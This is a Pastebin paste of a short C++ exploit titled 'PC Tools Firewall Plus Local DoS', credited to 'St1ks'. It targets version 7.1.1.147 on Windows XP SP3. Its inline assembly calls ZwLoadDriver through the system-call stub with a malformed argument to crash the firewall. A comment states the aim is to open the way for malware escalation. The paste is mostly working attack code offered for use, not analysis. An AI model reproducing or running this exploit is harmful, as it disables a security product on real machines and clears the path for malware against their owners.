emS-St1ks

PC Tools Firewall Plus Local DoS Modify St1ks

Aug 24th, 2012
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 0.59 KB | None | 0 0
  1. /*
  2. Exploit Title: PC Tools Firewall Plus Local DoS
  3. Version: 7.1.1.147
  4. Author: St1ks (St1ks Modify Version)
  5. Tested on: Windows XP SP3
  6. */
  7.  
  8. // After executing this small code, PC Tools Firewall crashes so it opens the way to malware escalation
  9. #include "stdafx.h"
  10. #include <Windows.h>
  11.  
  12. int _tmain(int argc, _TCHAR* argv[])
  13. {
  14.     for(int i=0;i<512;i++)
  15.         printf(".");
  16.      _asm
  17.      {
  18.           push 0xffffff
  19.           mov eax,61h ;          ZwLoadDriver
  20.           mov edx,7FFE0300h ; ntdll.KiFastSystemCall
  21.           call dword ptr ds:[edx]
  22.  
  23.      }
  24.  
  25.  
  26.      return 0;
  27. }
Advertisement
Add Comment
Please, Sign In to add comment